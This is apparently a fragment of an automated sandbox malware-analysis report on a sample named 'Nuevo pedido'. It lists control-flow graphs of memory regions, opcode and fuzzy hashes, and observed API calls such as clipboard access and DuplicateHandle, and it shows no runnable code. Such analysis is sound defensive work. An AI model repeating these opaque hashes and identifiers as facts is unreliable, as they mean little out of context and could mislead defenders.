139->78 142->1 142->120 145->85 146->85 147->85
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                            • API String ID: 0-1932283790
                                                                                                                                            • Opcode ID: 26be88989ae37900c8f868675b635f7f1054546802e1739815e2a43d371d419d
                                                                                                                                            • Instruction ID: 67352957c5caeda56aebcb4ae748556b225974b68ea6081cf4a0d36378a11edc
                                                                                                                                            • Opcode Fuzzy Hash: 26be88989ae37900c8f868675b635f7f1054546802e1739815e2a43d371d419d
                                                                                                                                            • Instruction Fuzzy Hash: 1E124630A102088FCB15EF69D984AAEBBF2FF88354F14856AE519DB365D730ED41CB90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1280 2f75f38-2f75f5a 1281 2f75f70-2f75f7b 1280->1281 1282 2f75f5c-2f75f60 1280->1282 1285 2f76023-2f7604f 1281->1285 1286 2f75f81-2f75f83 1281->1286 1283 2f75f62-2f75f6e 1282->1283 1284 2f75f88-2f75f8f 1282->1284 1283->1281 1283->1284 1288 2f75f91-2f75f98 1284->1288 1289 2f75faf-2f75fb8 1284->1289 1292 2f76056-2f76098 1285->1292 1287 2f7601b-2f76020 1286->1287 1288->1289 1290 2f75f9a-2f75fa5 1288->1290 1361 2f75fba call 2f75f2a 1289->1361 1362 2f75fba call 2f75f38 1289->1362 1290->1292 1293 2f75fab-2f75fad 1290->1293 1312 2f760cb-2f760cf 1292->1312 1313 2f7609a-2f760ae 1292->1313 1293->1287 1294 2f75fc0-2f75fc2 1295 2f75fc4-2f75fc8 1294->1295 1296 2f75fca-2f75fd2 1294->1296 1295->1296 1299 2f75fe5-2f76004 call 2f769a0 1295->1299 1300 2f75fd4-2f75fd9 1296->1300 1301 2f75fe1-2f75fe3 1296->1301 1306 2f76006-2f7600f 1299->1306 1307 2f76019 1299->1307 1300->1301 1301->1287 1365 2f76011 call 2f7aef0 1306->1365 1366 2f76011 call 2f7afad 1306->1366 1367 2f76011 call 2f7aeba 1306->1367 1307->1287 1309 2f76017 1309->1287 1314 2f76163-2f76165 1312->1314 1315 2f760d2-2f760d9 1312->1315 1316 2f760b0-2f760b6 1313->1316 1317 2f760bd-2f760c1 1313->1317 1363 2f76167 call 2f762f0 1314->1363 1364 2f76167 call 2f76300 1314->1364 1318 2f760da-2f760e7 1315->1318 1319 2f760e9-2f760f6 1315->1319 1316->1317 1317->1312 1327 2f760f8-2f76102 1318->1327 1319->1327 1320 2f7616d-2f76173 1321 2f76175-2f7617b 1320->1321 1322 2f7617f-2f76186 1320->1322 1325 2f761e1-2f76240 1321->1325 1326 2f7617d 1321->1326 1341 2f76247-2f7625b 1325->1341 1326->1322 1330 2f76104-2f76113 1327->1330 1331 2f7612f-2f76133 1327->1331 1339 2f76115-2f7611c 1330->1339 1340 2f76123-2f7612d 1330->1340 1332 2f76135-2f7613b 1331->1332 1333 2f7613f-2f76143 1331->1333 1336 2f7613d 1332->1336 1337 2f76189-2f761da 1332->1337 1333->1322 1338 2f76145-2f76149 1333->1338 1336->1322 1337->1325 1338->1341 1342 2f7614f-2f76161 1338->1342 1339->1340 1340->1331 1342->1322 1361->1294 1362->1294 1363->1320 1364->1320 1365->1309 1366->1309 1367->1309
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069
                                                                                                                                            • Opcode ID: b48ee06018f0aa190f32f4b25d1bce0df277cec2ed321d3460e6159bc95832e8
                                                                                                                                            • Instruction ID: c528cffbbd4b71ca5dd90a6e84c2a8c5faa14bc6078978192771cb1ba8854cf4
                                                                                                                                            • Opcode Fuzzy Hash: b48ee06018f0aa190f32f4b25d1bce0df277cec2ed321d3460e6159bc95832e8
                                                                                                                                            • Instruction Fuzzy Hash: 1B91CF31B042458FDB15AF34D858B6E7BA6BF88684F08886AE906CB392CF75C841C791

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1368 2f76498-2f764a5 1369 2f764a7-2f764ab 1368->1369 1370 2f764ad-2f764af 1368->1370 1369->1370 1371 2f764b4-2f764bf 1369->1371 1372 2f766c0-2f766c7 1370->1372 1373 2f764c5-2f764cc 1371->1373 1374 2f766c8 1371->1374 1375 2f764d2-2f764e1 1373->1375 1376 2f76661-2f76667 1373->1376 1378 2f766cd-2f766e0 1374->1378 1377 2f764e7-2f764f6 1375->1377 1375->1378 1379 2f7666d-2f76671 1376->1379 1380 2f76669-2f7666b 1376->1380 1386 2f7650b-2f7650e 1377->1386 1387 2f764f8-2f764fb 1377->1387 1389 2f766e2-2f76705 1378->1389 1390 2f76718-2f7671a 1378->1390 1381 2f76673-2f76679 1379->1381 1382 2f766be 1379->1382 1380->1372 1381->1374 1384 2f7667b-2f7667e 1381->1384 1382->1372 1384->1374 1388 2f76680-2f76695 1384->1388 1392 2f7651a-2f76520 1386->1392 1393 2f76510-2f76513 1386->1393 1391 2f764fd-2f76500 1387->1391 1387->1392 1409 2f76697-2f7669d 1388->1409 1410 2f766b9-2f766bc 1388->1410 1411 2f76707-2f7670c 1389->1411 1412 2f7670e-2f76712 1389->1412 1394 2f7672f-2f76736 1390->1394 1395 2f7671c-2f7672e 1390->1395 1396 2f76506 1391->1396 1397 2f76601-2f76607 1391->1397 1402 2f76522-2f76528 1392->1402 1403 2f76538-2f76555 1392->1403 1398 2f76566-2f7656c 1393->1398 1399 2f76515 1393->1399 1406 2f7662c-2f76639 1396->1406 1404 2f7661f-2f76629 1397->1404 1405 2f76609-2f7660f 1397->1405 1407 2f76584-2f76596 1398->1407 1408 2f7656e-2f76574 1398->1408 1399->1406 1413 2f7652c-2f76536 1402->1413 1414 2f7652a 1402->1414 1441 2f7655e-2f76561 1403->1441 1404->1406 1418 2f76613-2f7661d 1405->1418 1419 2f76611 1405->1419 1434 2f7664d-2f7664f 1406->1434 1435 2f7663b-2f7663f 1406->1435 1428 2f765a6-2f765c9 1407->1428 1429 2f76598-2f765a4 1407->1429 1421 2f76576 1408->1421 1422 2f76578-2f76582 1408->1422 1416 2f766af-2f766b2 1409->1416 1417 2f7669f-2f766ad 1409->1417 1410->1372 1411->1390 1412->1390 1413->1403 1414->1403 1416->1374 1425 2f766b4-2f766b7 1416->1425 1417->1374 1417->1416 1418->1404 1419->1404 1421->1407 1422->1407 1425->1409 1425->1410 1428->1374 1445 2f765cf-2f765d2 1428->1445 1443 2f765f1-2f765ff 1429->1443 1436 2f76653-2f76656 1434->1436 1435->1434 1437 2f76641-2f76645 1435->1437 1436->1374 1438 2f76658-2f7665b 1436->1438 1437->1374 1442 2f7664b 1437->1442 1438->1375 1438->1376 1441->1406 1442->1436 1443->1406 1445->1374 1447 2f765d8-2f765ea 1445->1447 1447->1443
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,bq$,bq
                                                                                                                                            • API String ID: 0-2699258169
                                                                                                                                            • Opcode ID: b828db39647218b9a2927ba30beebc34e5a45026718cd9fcbd7c85b7287cd85f
                                                                                                                                            • Instruction ID: c6bbef9e54b10aedec248e808614dbf91f64f502be59b9f5825328d0fcb341e8
                                                                                                                                            • Opcode Fuzzy Hash: b828db39647218b9a2927ba30beebc34e5a45026718cd9fcbd7c85b7287cd85f
                                                                                                                                            • Instruction Fuzzy Hash: 7881A135F00905CFCB14DF69C884AAABBBABF88688B54816AD605DB364DB31E841CF50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1507 2f7aeba-2f7aec0 1508 2f7af33-2f7af40 1507->1508 1509 2f7aec2-2f7aed9 1507->1509 1514 2f7af53-2f7af5e 1508->1514 1515 2f7af42-2f7af4d 1508->1515 1512 2f7aedf-2f7aee3 1509->1512 1513 2f7aedb-2f7aedd 1509->1513 1516 2f7aee9-2f7aeea 1512->1516 1513->1516 1519 2f7af64-2f7afc1 1514->1519 1520 2f7b02f-2f7b051 1514->1520 1521 2f7afd6-2f7b028 1515->1521 1522 2f7af51 1515->1522 1516->1508 1529 2f7afca-2f7afd3 1519->1529 1532 2f7b053-2f7b059 1520->1532 1533 2f7b0b1 1520->1533 1521->1520 1522->1514 1536 2f7b05b-2f7b074 call 2f77c88 1532->1536 1537 2f7b0b9-2f7b0e2 call 2f7b060 1532->1537 1534 2f7b0b3-2f7b0b8 1533->1534 1535 2f7b111-2f7b112 1533->1535 1534->1537 1539 2f7b114-2f7b115 1535->1539 1540 2f7b15b-2f7b16f 1535->1540 1557 2f7b076-2f7b083 1536->1557 1558 2f7b085-2f7b093 1536->1558 1550 2f7b1ab 1537->1550 1560 2f7b0e8-2f7b0ed 1537->1560 1544 2f7b117-2f7b11c 1539->1544 1545 2f7b0fb-2f7b10b 1539->1545 1555 2f7b171-2f7b177 1540->1555 1556 2f7b19e-2f7b1a8 1540->1556 1549 2f7b122-2f7b125 1544->1549 1544->1550 1545->1535 1549->1550 1553 2f7b12b-2f7b14a 1549->1553 1561 2f7b1b0-2f7b1ef 1550->1561 1553->1550 1580 2f7b14c-2f7b152 1553->1580 1555->1561 1562 2f7b179-2f7b196 1555->1562 1569 2f7b0a3-2f7b0a6 1557->1569 1570 2f7b095-2f7b09f 1558->1570 1571 2f7b0a1 1558->1571 1560->1550 1567 2f7b0f3 1560->1567 1574 2f7b1f7-2f7b1ff 1561->1574 1575 2f7b1f1-2f7b1f4 1561->1575 1562->1556 1567->1545 1570->1569 1571->1569 1576 2f7b267-2f7b26e 1574->1576 1577 2f7b201-2f7b207 1574->1577 1575->1574 1583 2f7b274-2f7b27b 1576->1583 1584 2f7b373-2f7b37c 1576->1584 1577->1576 1581 2f7b209-2f7b20f 1577->1581 1580->1561 1582 2f7b154-2f7b158 1580->1582 1585 2f7b215-2f7b222 1581->1585 1586 2f7b499-2f7b4cf 1581->1586 1582->1540 1589 2f7b281-2f7b289 1583->1589 1590 2f7b32a-2f7b330 1583->1590 1587 2f7b386-2f7b389 1584->1587 1588 2f7b37e-2f7b384 1584->1588 1585->1586 1594 2f7b228-2f7b250 1585->1594 1613 2f7b4d1-2f7b4dc 1586->1613 1614 2f7b4de-2f7b4e2 1586->1614 1591 2f7b494 1587->1591 1592 2f7b38f-2f7b39d 1587->1592 1588->1587 1596 2f7b3a0-2f7b3a4 1588->1596 1589->1591 1593 2f7b28f-2f7b298 1589->1593 1590->1586 1595 2f7b336-2f7b340 1590->1595 1591->1586 1592->1596 1593->1586 1597 2f7b29e-2f7b2d1 1593->1597 1594->1591 1631 2f7b256-2f7b259 1594->1631 1595->1586 1601 2f7b346-2f7b362 1595->1601 1599 2f7b427-2f7b42b 1596->1599 1600 2f7b3aa-2f7b3b3 1596->1600 1638 2f7b2d3 1597->1638 1639 2f7b31b-2f7b328 1597->1639 1603 2f7b42d-2f7b436 1599->1603 1604 2f7b48a-2f7b491 1599->1604 1600->1599 1605 2f7b3b5-2f7b3bb 1600->1605 1632 2f7b36a-2f7b36d 1601->1632 1603->1591 1608 2f7b438-2f7b43f 1603->1608 1605->1586 1610 2f7b3c1-2f7b3cb 1605->1610 1608->1604 1612 2f7b441 1608->1612 1610->1586 1615 2f7b3d1-2f7b3de 1610->1615 1618 2f7b444-2f7b44c 1612->1618 1613->1614 1621 2f7b4f4 1614->1621 1622 2f7b4e4-2f7b4f2 1614->1622 1615->1586 1619 2f7b3e4-2f7b40f 1615->1619 1623 2f7b480-2f7b483 1618->1623 1624 2f7b44e-2f7b45a 1618->1624 1619->1586 1657 2f7b415-2f7b41d 1619->1657 1627 2f7b4f6-2f7b4f8 1621->1627 1622->1627 1623->1591 1633 2f7b485-2f7b488 1623->1633 1624->1586 1629 2f7b45c-2f7b478 1624->1629 1634 2f7b4fe-2f7b506 1627->1634 1635 2f7b4fa-2f7b4fc 1627->1635 1629->1623 1631->1591 1640 2f7b25f-2f7b265 1631->1640 1632->1584 1632->1591 1633->1604 1633->1618 1636 2f7b529-2f7b52b 1634->1636 1637 2f7b508-2f7b51a 1634->1637 1635->1634 1641 2f7b52d-2f7b53a call 2f7abe0 1636->1641 1642 2f7b559-2f7b56a 1636->1642 1637->1636 1651 2f7b51c-2f7b527 1637->1651 1643 2f7b2d6-2f7b2dc 1638->1643 1639->1632 1640->1576 1640->1577 1641->1642 1655 2f7b53c-2f7b54b 1641->1655 1643->1586 1649 2f7b2e2-2f7b303 1643->1649 1649->1591 1663 2f7b309-2f7b30d 1649->1663 1651->1636 1655->1642 1662 2f7b54d-2f7b557 1655->1662 1657->1591 1658 2f7b41f-2f7b425 1657->1658 1658->1599 1658->1605 1662->1642 1663->1591 1664 2f7b313-2f7b319 1663->1664 1664->1639 1664->1643
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q
                                                                                                                                            • API String ID: 0-1946778100
                                                                                                                                            • Opcode ID: eedbf0f9d0eac88614780f57a7863b16ff821a508349a55861b2b802410b663f
                                                                                                                                            • Instruction ID: a85c348869d00ad2fd1dfb9e56eb7bd056067ab90bf9ce28f3b368132985488b
                                                                                                                                            • Opcode Fuzzy Hash: eedbf0f9d0eac88614780f57a7863b16ff821a508349a55861b2b802410b663f
                                                                                                                                            • Instruction Fuzzy Hash: 4561B331B001098FC704DF69C854AAEBBB2FFC9798B14856AE616DB3A4DB319C11CB90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: bbcd0bfc17388ed08520cee1bb70c6f5d68f8ee87794cc48b8f5f1e667dc292d
                                                                                                                                            • Instruction ID: cd914a72c476316edf89ca9c5b00bc786698db743e9b8dcba71f2ffe94ab77f0
                                                                                                                                            • Opcode Fuzzy Hash: bbcd0bfc17388ed08520cee1bb70c6f5d68f8ee87794cc48b8f5f1e667dc292d
                                                                                                                                            • Instruction Fuzzy Hash: BA71C174E00258CFDB14DFA9D884A9DBBF2FF49310F1090AAE919AB361DB319985CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4'^q$4'^q
                                                                                                                                            • API String ID: 0-2697143702
                                                                                                                                            • Opcode ID: ee32396ca888eef65f5ef1e8922798cbe71e66f635f84e6617eb60e258b6cfae
                                                                                                                                            • Instruction ID: d3e7716e3d18a2a24b6d15c45f95f2d70da7fc0ffa4984d988c1e0fe9201240b
                                                                                                                                            • Opcode Fuzzy Hash: ee32396ca888eef65f5ef1e8922798cbe71e66f635f84e6617eb60e258b6cfae
                                                                                                                                            • Instruction Fuzzy Hash: 2A51B831B002159FDB04DF69C844B6ABBE7EF88394F04846AEA49CB355DBB1DC41CB91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Xbq$Xbq
                                                                                                                                            • API String ID: 0-1243427068
                                                                                                                                            • Opcode ID: 31963d2692bd7321c19d03badb43ef12bd18bfeeb4ebf93bcc642e263288df0e
                                                                                                                                            • Instruction ID: 335299d0ec19f3bd374e3cc14f9233f24d48aadee3b1efd5e55d074830cb6f54
                                                                                                                                            • Opcode Fuzzy Hash: 31963d2692bd7321c19d03badb43ef12bd18bfeeb4ebf93bcc642e263288df0e
                                                                                                                                            • Instruction Fuzzy Hash: 68315C32F443299BDF184679859437EAAE6ABC4280F0848BFEA07C3380DBB5CC45E751
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $^q$$^q
                                                                                                                                            • API String ID: 0-355816377
                                                                                                                                            • Opcode ID: eea740af2044ac9c8399b20e4af34596160efa7ca4139021cf7e44d4283b7e75
                                                                                                                                            • Instruction ID: 835a68f2719e1a65a22b12450c82b426d5e835f4b8ebf8b6a9928eca211e46ae
                                                                                                                                            • Opcode Fuzzy Hash: eea740af2044ac9c8399b20e4af34596160efa7ca4139021cf7e44d4283b7e75
                                                                                                                                            • Instruction Fuzzy Hash: 0C31CF31B001158FCB298B79D898BBE77A7BB847D0B14086BF112CB292EF29CC81D755
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: 83f3a60ffb3118de15e6109ce77be0ff79a97b2bfcaf87d5c04154c2c3d8679c
                                                                                                                                            • Instruction ID: 4357f98ddbe0241f52ce0765a2d05f837301d1fe918ee397b40aa918ca8d781e
                                                                                                                                            • Opcode Fuzzy Hash: 83f3a60ffb3118de15e6109ce77be0ff79a97b2bfcaf87d5c04154c2c3d8679c
                                                                                                                                            • Instruction Fuzzy Hash: 38520934D41219CFCB55DF65EA88A8DBBB2FB48301F5085AAD409AB354DB746EC5CF80
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR^q
                                                                                                                                            • API String ID: 0-2625958711
                                                                                                                                            • Opcode ID: 13c8f2e8ff328f7bacc7d1544e40aba9b96313fb05d0f61aed1cddef537865a6
                                                                                                                                            • Instruction ID: 5cf1cb29649906b2c4c94ee41a42a2e4bd3b6ac1223247a9718880a3e2f8749c
                                                                                                                                            • Opcode Fuzzy Hash: 13c8f2e8ff328f7bacc7d1544e40aba9b96313fb05d0f61aed1cddef537865a6
                                                                                                                                            • Instruction Fuzzy Hash: B852F974D41219CFCB54DF65EA88A8DBBB2FB48301F5085AAD409AB354DB746EC5CF80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 17cf08b3179c6cd9aa1e94a0b2da3cdfa1ba93381ad5058756baa045cc8a7763
                                                                                                                                            • Instruction ID: 45d12fd1b52891eed310609fca0256f037de23a64cb551e94f4cd2b41fc232e9
                                                                                                                                            • Opcode Fuzzy Hash: 17cf08b3179c6cd9aa1e94a0b2da3cdfa1ba93381ad5058756baa045cc8a7763
                                                                                                                                            • Instruction Fuzzy Hash: 4BA16CB4E002498FDB54EFA9C988AAEBBF5FF48304F15845AE455AB351C734E940CBA1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220874293-0
                                                                                                                                            • Opcode ID: 348c08f0bf7acf73247669a4d047cd083963dc493176a65a59819a9a1aa1606e
                                                                                                                                            • Instruction ID: 426d3b6197eff17d1dda5832042dcb7ec7bb70d79b26121d5e1edafd22719ccb
                                                                                                                                            • Opcode Fuzzy Hash: 348c08f0bf7acf73247669a4d047cd083963dc493176a65a59819a9a1aa1606e
                                                                                                                                            • Instruction Fuzzy Hash: 233134B190124CDFDB24DF99C984BCDBBF5AF49304F208059E408BB290D774A945CF95
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220874293-0
                                                                                                                                            • Opcode ID: bfe59ab08074ac6c42d056687a925132ce98e144fa3ed638cb683f2c7060ec76
                                                                                                                                            • Instruction ID: 2e76503f17e10ffefbbe521b2948c9135b9a264b67e5599c3c4ac61ce131c8ce
                                                                                                                                            • Opcode Fuzzy Hash: bfe59ab08074ac6c42d056687a925132ce98e144fa3ed638cb683f2c7060ec76
                                                                                                                                            • Instruction Fuzzy Hash: D43112B1D01248DFDB24CF99C984BCEBBF5AF49304F248059E408BB294D775A945CF95
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D89166,?,?,?,?,?), ref: 06D89227
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 16ab807f5c085dbdc8cab8f288a1fe92b1e0eb6415ecfa60b8f808b99cfbdeac
                                                                                                                                            • Instruction ID: 00390ca96299e2c2b1ed3fd668f845ddd11306c2b1506d83b988cd6a08786707
                                                                                                                                            • Opcode Fuzzy Hash: 16ab807f5c085dbdc8cab8f288a1fe92b1e0eb6415ecfa60b8f808b99cfbdeac
                                                                                                                                            • Instruction Fuzzy Hash: 9E21E4B5900208DFDB10DF9AD984AEEFBF9FB48310F14841AE955A7350D379A950CFA4
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D89166,?,?,?,?,?), ref: 06D89227
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 585be83ec19b7daf53bb3d57f72d58f27d9762098c20573fa971ab38ff8f4b53
                                                                                                                                            • Instruction ID: 7ba9fc59ae12e7e521a86fd580b1c4d5a633334d535f3526d70f66de71a72a47
                                                                                                                                            • Opcode Fuzzy Hash: 585be83ec19b7daf53bb3d57f72d58f27d9762098c20573fa971ab38ff8f4b53
                                                                                                                                            • Instruction Fuzzy Hash: 0621E4B5900258DFDB10DF9AD984AEEFBF4FB48310F14801AE958A7310D378A944CFA4
                                                                                                                                            APIs
                                                                                                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06D88245,?,?,?), ref: 06D8B28D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2030045667-0
                                                                                                                                            • Opcode ID: 89506518b6e9e29cc15f20efc6d4ea3da0d1299db861910ffe341c6e8d8a2fa9
                                                                                                                                            • Instruction ID: 5ebf6ff8dca6d687e3444e7f38eeb55987b6246d87b6a0fd45edb1b484895b82
                                                                                                                                            • Opcode Fuzzy Hash: 89506518b6e9e29cc15f20efc6d4ea3da0d1299db861910ffe341c6e8d8a2fa9
                                                                                                                                            • Instruction Fuzzy Hash: EC21EFB58013499FCB20DF9AD888ADEFBB5BB48314F14842EE859A7200D375A544CBA4
                                                                                                                                            APIs
                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06D8AE60,041042A8,031B3570), ref: 06D8AEF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                            • Opcode ID: 442f5bc5a3b75664f3a3b51d06198e0a66ccf4e55c172ff8610c00f821aaa23c
                                                                                                                                            • Instruction ID: 370da365d613a435a172ebd91afed0211dc6b1bfd65f73800aced44dfba5fec9
                                                                                                                                            • Opcode Fuzzy Hash: 442f5bc5a3b75664f3a3b51d06198e0a66ccf4e55c172ff8610c00f821aaa23c
                                                                                                                                            • Instruction Fuzzy Hash: 432129B1D042198FDB54DF9AC848BEEFBF5EB88310F14842AD454A7350D774A944CFA5
                                                                                                                                            APIs
                                                                                                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,06D8AE60,041042A8,031B3570), ref: 06D8AEF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumThreadWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2941952884-0
                                                                                                                                            • Opcode ID: b433677a6506ced921b85e988560193488bd4b50637913eabb557fb419646f47
                                                                                                                                            • Instruction ID: cb4530be945b35bcad00b57d1f1445273706157b565e6a769e65b5d1481edbfe
                                                                                                                                            • Opcode Fuzzy Hash: b433677a6506ced921b85e988560193488bd4b50637913eabb557fb419646f47
